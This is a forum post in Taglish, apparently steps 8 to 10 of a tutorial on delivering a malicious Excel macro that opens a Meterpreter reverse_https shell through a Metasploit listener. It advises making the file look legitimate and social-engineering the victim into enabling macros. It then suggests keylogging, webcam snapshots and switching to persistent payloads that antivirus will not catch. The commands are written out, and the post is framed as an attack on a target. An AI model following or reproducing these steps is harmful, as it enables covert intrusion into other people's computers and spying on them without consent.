Nicolandia15
Eternal Poster
- Joined
- Jan 12, 2016
- Posts
- 581
- Reaction
- 506
- Points
- 265
Step 8:
Enable natin yung Developer Tab sa Excel. I'm using Excel 2013 currently.
File > Options > Customized Ribbon then sa right side check mo lang yung Developer just like sa screenshot.
After nun click mo yung Developer Tab then Visual Basic
Then paste mo yung shell na ginawa natin previously. Looks like this
Save mo yung file. Para mas effective lagyan mo ng kung ano anong text yung Excel. Nakakapagtaka pag empty lang.
Step 9:
Back to Kali, setup natin yung listener.
Type mo yung
Code:
msfconsole
Code:
use exploit/multi/handler
Code:
set PAYLOAD windows/meterpreter/reverse_https
Optional:
Code:
show options
Step 10:
Start natin yung listener
Code:
exploit -j
At this point. I assume na na send mo na sa target yung excel file. Make sure na naka open na yung listener bago nya ma open just to make sure na magka session tayo sa meterpreter. Kailangan niya din i-enable yung macro sa Excel na na receive nya. May pop-up yun pag inopen niya na yung file, dagdag mo na lang yung instructions para ma sure (Social Engineering baby!)
Once ma open na ng target yung file. Type this para mag interact. Disregard yung yahoo! sa screenshot. Local IP lang yan since I target my other machine na naka connect sa same network. Palitan mo lang ng public IP mo kung gusto mo siya gumana over WAN
Code:
sessions -i 1
There you go! Kaw na bahala after jan. Basta may access na tayo. As long na nakabukas yung Excel file may session tayo. You can run any other meterpreter code or mag upload ng ibang exploit like keyboard sniffer. Pero yung favorite ko webcam snap. Kukuha siya ng snapshot kung may web camera man na gamit yung target.
Ulit. After nung session nag run ako ng full scan using Avira and malinis wala siyang nakita. Nakaupo sa memory yung shell btw. Pag chineck mo naman yung process sa Windows may terminal ka na makikita na naka open so pag wala kang naalala na inopen yun then somebody is accessing your machine remotely. What to do? Close mo yung file then reinstall. So far yun lang yung best na panlaban.
FAQ:
Q: Persistent yung payload?
A: Nope. Once ma close yung file ma cclose na yung session. So once nagka session ka, use other meterpreter payload na persistent and hope hindi mahuli ng antivirus.
Last edited: